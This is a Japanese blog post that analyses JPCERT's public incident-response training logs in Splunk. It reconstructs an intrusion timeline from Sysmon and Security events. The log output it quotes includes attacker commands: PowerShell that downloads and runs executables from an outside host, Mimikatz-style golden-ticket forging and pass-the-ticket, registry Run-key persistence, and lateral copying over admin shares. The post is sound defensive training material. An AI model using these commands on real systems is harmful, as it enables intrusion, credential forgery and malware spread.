LoginSignup
0
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 3 years have passed since last update.

@toshikawa(川俣 利久)

SplunkでJPCERTログ分析トレーニング(その1のデータ分析)

Posted at

https://blogs.jpcert.or.jp/ja/2020/07/log_analysis_training.html
で「インシデント対応ハンズオン」でやってきたデータが公開されたのでSplunkでやってみる。

せっかくフィールドも抽出したので、Splunkっぽくやってみたい。

準備

https://qiita.com/toshikawa/items/926c63a9f77a0835c94e
をみてください。

transforms.conf設定済み前提

調査

win.exeから

source="Handson1.zip:*" win.exe

まずは、win.exeで検索
qiita1.png
こんな結果になるはず。

とりあえずは、タイムラインの最初がちょこちょこ離れているので、クリックして見てみる。
qiita2.png

選択した時間帯、ここだと2019/11/07 15:44~15:55の間のログとフィールドに制限される。
送信元アドレスアカウント名はあとで調べるために〆(._.)メモメモ

「選択解除」して、次の時刻をクリックするとスケジュールされたタスクが作成されました。のイベントが表示される。

2019/11/07_15;49;21
サブジェクト:
	セキュリティ_ID:		EXAMPLE\Administrator
	アカウント名:		sysg.admin
	アカウント ドメイン:		EXAMPLE
	ログオン_ID:		0xfd151

タスク情報:
	タスク名: 		\At1
	タスク コンテンツ: 		<?xml version=""1.0"" encoding=""UTF-16""?>
<Task version=""1.0"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task"">
  <RegistrationInfo />
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2019-11-07T15:53:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id=""Author"">
      <UserId>@AtServiceAccount</UserId>
      <LogonType>InteractiveTokenOrPassword</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context=""Author"">
    <Exec>
      <Command>cmd</Command>
      <Arguments>/c C:\Intel\Logs\win.exe</Arguments>
    </Exec>
  </Actions>
</Task>

source="Handson1.zip:*" At1

で確認すると、タスクスケジューラーが指定した時間に動いているのが確認できる。

win.exeにもどって、15:53~15:54を確認する。

eventIDを確認すると

eventID count
4656 5
4658 5
4663 5
1 3
4688 1
5156 1

あと、オブジェクト名

|オブジェクト名|count|
|:--|--:|:--|--:|
| C:\Windows\Temp\notilv.exe | 6 |
| C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\2a0d56b61774e9b4803d266905a55f33_02ea0504-08d5-4caf-a230-fcf2baca78fc | 2 |
| C:\Windows\Temp\ibmCon6.tmp | 2 |

ということなので、怪しげなファイルの作成がここらへんからもうかがえる。
これも〆(._.)メモメモ

その2

あとは時間を「全時間」に戻して

win.exe

source="Handson1.zip:*"  ParentCommandLine="*win.exe"
| table _time CommandLine eventID ParentCommandLine User
検索結果
_time CommandLine eventID ParentCommandLine User
2019/11/07 15:53:00 C:\Intel\Logs\win.exe 1 C:\Windows\system32\cmd.EXE /c C:\Intel\Logs\win.exe NT AUTHORITY\SYSTEM
2019/11/07 15:53:01 c:\windows\system32\cmd.exe 1 C:\Intel\Logs\win.exe NT AUTHORITY\SYSTEM
2019/11/07 15:58:02 cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit 1 C:\Intel\Logs\win.exe NT AUTHORITY\SYSTEM
2019/11/07 16:00:14 cmd /c echo $p = New-Object System.Net.WebClient > C:\Intel\Logs\s.ps1 1 C:\Intel\Logs\win.exe NT AUTHORITY\SYSTEM
2019/11/07 16:05:45 cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit 1 C:\Intel\Logs\win.exe NT AUTHORITY\SYSTEM
2019/11/07 16:06:03 cmd /c net use \Win7_64JP_03\c$ 1 C:\Intel\Logs\win.exe NT AUTHORITY\SYSTEM

notilv.exe

source="Handson1.zip:*"  ParentCommandLine="*notilv.exe*"
| table _time CommandLine eventID ParentCommandLine User
| sort  _time
検索結果
_time CommandLine eventID ParentCommandLine User
2019/11/07 15:53:42 cmd /c dir C:\Users*.doc* /s /o-d > C:\Intel\Logs\g.txt 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:54:06 cmd /c dir C:\Users*.xls* /s /o-d > C:\Intel\Logs\gg.txt 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:54:30 cmd /c type C:\Intel\Logs\gg.txt 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:54:51 cmd /c ping 192.168.16.105 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:55:15 cmd /c ping 192.168.16.106 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:55:39 cmd /c ping 192.168.16.105 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:56:03 cmd /c echo $p = New-Object System.Net.WebClient > C:\Intel\Logs\z.ps1 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:56:28 cmd /c echo $p.DownloadFile(http://anews-web.co/mz.exe, C:\Intel\Logs\mz.exe) >> C:\Intel\Logs\z.ps1 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:56:55 cmd /c powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\z.ps1 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:57:28 cmd /c C:\Intel\Logs\mz.exe kerberos::golden /domain:example.co.jp /sid:S-1-5-21-1524084746-3249201829-3114449661 /rc4:b23a3443a12bf736973741f65ddcbc83 /user:sysg.admin /id:500 /ticket:C:\Intel\Logs\500.kirbi exit 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 15:59:37 cmd /c net use \Win7_64JP_03\c$ 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:01:14 cmd /c echo $p.DownloadFile(http://anews-web.co/server.exe, C:\Intel\Logs\server.exe) >> C:\Intel\Logs\s.ps1 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:03:23 cmd /c powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\s.ps1 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:03:41 cmd /c copy C:\Intel\Logs\server.exe \Win7_64JP_03\c$\Intel\Logs\server.exe 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:04:45 cmd /c klist purge 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:06:24 cmd /c copy C:\Intel\Logs\server.exe \Win7_64JP_03\c$\Intel\Logs\server.exe 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:09:09 cmd /c klist purge 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:09:37 cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:09:55 cmd /c net use \Win7_64JP_03\c$ 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:10:13 cmd /c copy C:\Intel\Logs\server.exe \Win7_64JP_03\c$\Intel\Logs\server.exe 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo
2019/11/07 16:12:53 cmd /c C:\Intel\Logs\z.bat 1 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe EXAMPLE\chiyoda.tokyo

Securityイベントによる合わせ技

source="Handson1.zip:*"  "オブジェクト名"=* "プロセス名"="*notilv.exe" OR "プロセス名"="*win.exe"
| table _time プロセス名 オブジェクト名 eventID アカウント名
| sort _time
| dedup オブジェクト名
結果
_time プロセス名 オブジェクト名 eventID アカウント名
2019/11/07 15:53:04 C:\Intel\Logs\win.exe C:\Windows\Temp\ibmCon6.tmp 4656 WIN7_64JP_01$
2019/11/07 15:53:04 C:\Intel\Logs\win.exe C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\2a0d56b61774e9b4803d266905a55f33_02ea0504-08d5-4caf-a230-fcf2baca78fc 4656 WIN7_64JP_01$
2019/11/07 15:53:04 C:\Intel\Logs\win.exe C:\Windows\Temp\notilv.exe 4656 WIN7_64JP_01$
2019/11/07 15:53:42 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\142241315053532423424.txt 4656 chiyoda.tokyo
2019/11/07 15:54:06 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\14224131505353242342421.txt 4656 chiyoda.tokyo
2019/11/07 15:54:30 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\14224131502178712.txt 4656 chiyoda.tokyo
2019/11/07 15:54:51 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\12821378217388412989000.txt 4656 chiyoda.tokyo
2019/11/07 15:55:15 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\128213782173884781721.txt 4656 chiyoda.tokyo
2019/11/07 15:55:39 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\128213782173884212222.txt 4656 chiyoda.tokyo
2019/11/07 15:56:03 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\1422331223989080.txt 4656 chiyoda.tokyo
2019/11/07 15:56:28 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\14223312377773.txt 4656 chiyoda.tokyo
2019/11/07 15:56:55 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\142233122090000000092.txt 4656 chiyoda.tokyo
2019/11/07 15:57:28 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\1422411290092872.txt 4656 chiyoda.tokyo
2019/11/07 15:58:02 C:\Intel\Logs\win.exe C:\Windows\Temp\142233123299993.txt 4656 WIN7_64JP_01$
2019/11/07 15:59:37 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\142241315021028837.txt 4656 chiyoda.tokyo
2019/11/07 16:00:14 C:\Intel\Logs\win.exe C:\Windows\Temp\142233121212124.txt 4656 WIN7_64JP_01$
2019/11/07 16:01:14 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\1422331223899723.txt 4656 chiyoda.tokyo
2019/11/07 16:03:23 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\1422331233332225.txt 4656 chiyoda.tokyo
2019/11/07 16:03:41 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\142241315044493.txt 4656 chiyoda.tokyo
2019/11/07 16:04:45 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\142241333.txt 4656 chiyoda.tokyo
2019/11/07 16:05:45 C:\Intel\Logs\win.exe C:\Windows\Temp\1422331221989822.txt 4656 WIN7_64JP_01$
2019/11/07 16:06:03 C:\Intel\Logs\win.exe C:\Windows\Temp\14224131501211277.txt 4656 WIN7_64JP_01$
2019/11/07 16:06:24 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\1422413150112121.txt 4656 chiyoda.tokyo
2019/11/07 16:09:09 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\14224123234234.txt 4656 chiyoda.tokyo
2019/11/07 16:09:37 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\14223312554433222.txt 4656 chiyoda.tokyo
2019/11/07 16:09:55 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\1422413150234807.txt 4656 chiyoda.tokyo
2019/11/07 16:10:13 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\14224131501214213.txt 4656 chiyoda.tokyo
2019/11/07 16:12:53 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe C:\Users\CHIYOD~1.EXA\AppData\Local\Temp\123712389791237322398293883.txt 4656 chiyoda.tokyo

やられたこと一覧

source="Handson1.zip:*" source="Handson1.zip:./Handson1/Sysmon.csv" NOT "%SystemRoot" NOT "-Embedding" 
| table _time ParentCommandLine CommandLine 
| search ParentCommandLine=* 
| sort _time
結果
_time ParentCommandLine CommandLine
2019/11/07 15:53:00 taskeng.exe {54713E6C-87C6-4368-99B5-3DB599A32F37} S-1-5-18:NT AUTHORITY\System:Service: C:\Windows\system32\cmd.EXE /c C:\Intel\Logs\win.exe
2019/11/07 15:53:00 C:\Windows\system32\cmd.EXE /c C:\Intel\Logs\win.exe C:\Intel\Logs\win.exe
2019/11/07 15:53:01 C:\Intel\Logs\win.exe c:\windows\system32\cmd.exe
2019/11/07 15:53:04 c:\windows\system32\cmd.exe reg add hkcu\software\microsoft\windows\currentversion\run /v netshare /f /d C:\Windows\TEMP\notilv.exe /t REG_EXPAND_SZ
2019/11/07 15:53:42 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c dir C:\Users*.doc* /s /o-d > C:\Intel\Logs\g.txt
2019/11/07 15:54:06 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c dir C:\Users*.xls* /s /o-d > C:\Intel\Logs\gg.txt
2019/11/07 15:54:30 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c type C:\Intel\Logs\gg.txt
2019/11/07 15:54:51 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c ping 192.168.16.105
2019/11/07 15:54:51 cmd /c ping 192.168.16.105 ping 192.168.16.105
2019/11/07 15:55:15 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c ping 192.168.16.106
2019/11/07 15:55:15 cmd /c ping 192.168.16.106 ping 192.168.16.106
2019/11/07 15:55:39 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c ping 192.168.16.105
2019/11/07 15:55:39 cmd /c ping 192.168.16.105 ping 192.168.16.105
2019/11/07 15:56:03 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c echo $p = New-Object System.Net.WebClient > C:\Intel\Logs\z.ps1
2019/11/07 15:56:28 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c echo $p.DownloadFile(http://anews-web.co/mz.exe, C:\Intel\Logs\mz.exe) >> C:\Intel\Logs\z.ps1
2019/11/07 15:56:55 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\z.ps1
2019/11/07 15:56:55 cmd /c powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\z.ps1 powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\z.ps1
2019/11/07 15:57:28 cmd /c C:\Intel\Logs\mz.exe kerberos::golden /domain:example.co.jp /sid:S-1-5-21-1524084746-3249201829-3114449661 /rc4:b23a3443a12bf736973741f65ddcbc83 /user:sysg.admin /id:500 /ticket:C:\Intel\Logs\500.kirbi exit C:\Intel\Logs\mz.exe kerberos::golden /domain:example.co.jp /sid:S-1-5-21-1524084746-3249201829-3114449661 /rc4:b23a3443a12bf736973741f65ddcbc83 /user:sysg.admin /id:500 /ticket:C:\Intel\Logs\500.kirbi exit
2019/11/07 15:57:28 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c C:\Intel\Logs\mz.exe kerberos::golden /domain:example.co.jp /sid:S-1-5-21-1524084746-3249201829-3114449661 /rc4:b23a3443a12bf736973741f65ddcbc83 /user:sysg.admin /id:500 /ticket:C:\Intel\Logs\500.kirbi exit
2019/11/07 15:58:00 taskeng.exe {54713E6C-87C6-4368-99B5-3DB599A32F37} S-1-5-18:NT AUTHORITY\System:Service: C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
2019/11/07 15:58:02 C:\Intel\Logs\win.exe cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit
2019/11/07 15:58:02 cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit
2019/11/07 15:58:25 C:\Windows\system32\services.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
2019/11/07 15:59:37 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c net use \Win7_64JP_03\c$
2019/11/07 15:59:37 cmd /c net use \Win7_64JP_03\c$ net use \Win7_64JP_03\c$
2019/11/07 16:00:14 C:\Intel\Logs\win.exe cmd /c echo $p = New-Object System.Net.WebClient > C:\Intel\Logs\s.ps1
2019/11/07 16:01:14 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c echo $p.DownloadFile(http://anews-web.co/server.exe, C:\Intel\Logs\server.exe) >> C:\Intel\Logs\s.ps1
2019/11/07 16:03:06 C:\Windows\system32\services.exe taskhost.exe $(Arg0)
2019/11/07 16:03:23 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\s.ps1
2019/11/07 16:03:23 cmd /c powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\s.ps1 powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\s.ps1
2019/11/07 16:03:41 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c copy C:\Intel\Logs\server.exe \Win7_64JP_03\c$\Intel\Logs\server.exe
2019/11/07 16:04:45 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c klist purge
2019/11/07 16:05:45 C:\Intel\Logs\win.exe cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit
2019/11/07 16:05:45 cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit
2019/11/07 16:06:03 C:\Intel\Logs\win.exe cmd /c net use \Win7_64JP_03\c$
2019/11/07 16:06:03 cmd /c net use \Win7_64JP_03\c$ net use \Win7_64JP_03\c$
2019/11/07 16:06:24 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c copy C:\Intel\Logs\server.exe \Win7_64JP_03\c$\Intel\Logs\server.exe
2019/11/07 16:08:30 C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
2019/11/07 16:08:36 C:\Windows\system32\cmd.exe klist
2019/11/07 16:08:46 C:\Windows\system32\cmd.exe klist purge
2019/11/07 16:09:09 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c klist purge
2019/11/07 16:09:37 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit
2019/11/07 16:09:37 cmd /c C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit C:\Intel\Logs\mz.exe kerberos::ptt C:\Intel\Logs\500.kirbi exit
2019/11/07 16:09:55 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c net use \Win7_64JP_03\c$
2019/11/07 16:09:55 cmd /c net use \Win7_64JP_03\c$ net use \Win7_64JP_03\c$
2019/11/07 16:10:13 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c copy C:\Intel\Logs\server.exe \Win7_64JP_03\c$\Intel\Logs\server.exe
2019/11/07 16:12:53 C:\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe cmd /c C:\Intel\Logs\z.bat
2019/11/07 16:12:53 cmd /c C:\Intel\Logs\z.bat at.exe \Win7_64JP_03 16:17 cmd /c C:\Intel\Logs\server.exe
2019/11/07 16:30:08 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource core
2019/11/07 16:30:25 C:\Windows\system32\services.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc

198.51.100.101

source="Handson1.zip:*" "198.51.100.101"
| stats min(_time) max(_time) | convert ctime(min(_time)) ctime(max(_time))

11/07/2019 15:15:03〜11/07/2019 17:59:59

これくらいで、一応大体の概要がつかめた(と思います。)

Powershell.csv

有益な情報なし。ファイル名がでてなかった。

まとめ

今回だとwin.exenotilv.exeをキーワードとして、時間を絞って抽出されたフィールドを見ながら情報収集していくと思います。

本当だったら、すぐにでも通信先を抑えて、止めたいところです。

普段からログをみていないと、検索できないのでそこが肝心ですかね。

0
2
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?